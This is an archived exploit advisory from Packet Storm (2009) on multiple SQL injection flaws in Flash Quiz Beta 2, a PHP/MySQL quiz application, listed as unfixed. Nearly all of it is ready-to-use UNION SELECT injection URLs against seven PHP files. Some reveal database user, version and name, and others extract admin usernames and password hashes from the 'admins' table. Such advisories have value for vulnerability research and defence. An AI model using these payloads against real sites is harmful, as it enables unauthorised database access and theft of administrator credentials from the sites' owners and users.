what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flash Quiz Beta 2 SQL Injection

Flash Quiz Beta 2 SQL Injection
Posted May 22, 2009
Authored by YEnH4ckEr

Flash Quiz Beta 2 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | aeb6b04c2a877b8710db865fb1db1c34d647d1182a255efa2433642109b5022b

Flash Quiz Beta 2 SQL Injection

Change Mirror Download
--------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2-->
--------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/flashquiz/
-->DOWNLOAD: http://sourceforge.net/projects/flashquiz/
-->DEMO: N/A
-->CATEGORY: CMS / Testing
-->DESCRIPTION: A Flash quiz system with a PHP/MYSQL back end supporting multiple
quizzes per instance, result tracking, and high score tracking.
-->RELEASED: 2009-04-13

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: Beta 2 (maybe <= ?)
-->Discovered Bug date: 2009-05-20
-->Reported Bug date: 2009-05-20
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is completely vulnerable to sql injection.


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'quiz'

[++] File vuln --> 'num_questions.php'


~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*


[++] GET var --> 'quiz' and 'order_number'

[++] File vuln --> 'answers.php'


~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*

~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*


[++] GET var --> 'quiz'

[++] File vuln --> 'high_score.php'


~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/*


[++] GET var --> 'quiz'

[++] File vuln --> 'high_score_web.php'


~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/*


[++] GET var --> 'quiz'

[++] File vuln --> 'results_table_web.php'


~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+version(),user(),concat(user(),0x3A3A3A,version()),database(),current_user(),6,database()/*


[++] GET var --> 'quiz' and 'order_number'

[++] File vuln --> 'question.php'


~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*

~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*


[++[Return]++] ~~~~~> user, version and database in DB.


----------
EXPLOITS:
----------


~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*


[++[Return]++] ~~~~~> username:::password_hash in 'admins' table



#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close